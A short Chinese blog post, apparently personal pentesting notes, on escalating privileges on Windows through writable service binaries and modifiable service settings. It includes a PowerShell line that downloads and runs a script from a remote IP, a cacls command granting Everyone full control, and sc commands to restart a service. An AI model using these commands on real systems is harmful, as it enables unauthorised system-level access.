Vulnerable Services提权

前言:都写出来记录下吧

检测方法:
以test01账户检测对当前所有的服务有没有读写权限:accesschk.exe /accepteula test01 -c *

msf中的模块:exploit/windows/local/service_permissions

powershell的PowerUp中的Invoke-AllChecks:powershell -exec bypass -c "IEX(New-Object Net.WebClient).DownloadString('http://120.79.66.58/mypowershell/PowerUp.ps1');Invoke-AllChecks"


先给大家讲下什么叫做Vulnerable Services,我就用自己的理解来说明了...

可以想象下,services.msc服务项,例如如下图

我们可控的有两个点:

1、服务二进制文件:比如"D:Program Files (x86)WPS Officewpscloudsvr.exe" LocalService这个路径下的文件我们是否具有读写权限,我们可以通过覆盖这个文件,然后进行重启服务来进行提权的操作

cacls "D:Program Files (x86)WPS Office" /e /t /g everyone:F

替换文件

在进行相关重启服务

sc stop wpscloudsvr

sc start wpscloudsvr


2、Windows服务:比如Acunetix这个服务,我们当前权限是否能够进行修改其中的参数,如果可以修改参数那么我们同样也可以进行提权,因为启动服务的时候是以LocalSystem权限进行启动的

修改服务

查看服务

启动服务

提权成功!

参考文章:https://blog.csdn.net/nzjdsds/article/details/82284306
参考文章:https://www.freebuf.com/vuls/87463.html

原文地址:https://www.cnblogs.com/zpchcbd/p/12232703.html